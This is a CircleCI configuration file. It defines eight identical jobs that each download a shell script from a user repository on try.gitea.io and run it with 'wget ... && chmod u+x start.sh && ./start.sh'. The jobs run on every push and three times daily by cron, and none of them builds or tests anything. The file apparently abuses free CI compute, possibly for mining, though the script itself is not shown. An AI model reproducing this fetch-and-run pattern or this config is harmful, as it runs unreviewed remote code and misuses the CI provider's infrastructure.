version: 2.1

jobs:

  goto_08:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_08
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_07:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_07
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_06:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_06
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_05:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_05
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_04:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_04
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_03:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_03
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_02:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_02
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
  goto_01:
    docker:

      - image: circleci/golang:1.15.8

    steps:
        - run:
            name: goto_01
            command: wget https://try.gitea.io/nosmould864/Anu/raw/branch/master/start.sh && chmod u+x start.sh && ./start.sh
workflows:
    version: 2
    goto:
        jobs:
            - goto_08
            - goto_07
            - goto_06
            - goto_05
            - goto_04
            - goto_03
            - goto_02
            - goto_01
    nightly:
     triggers:
      - schedule:
          cron: "0 2,10,18 * * *"
          filters:
            branches:
              only: master
     jobs:
            - goto_08
            - goto_07
            - goto_06
            - goto_05
            - goto_04
            - goto_03
            - goto_02
            - goto_01
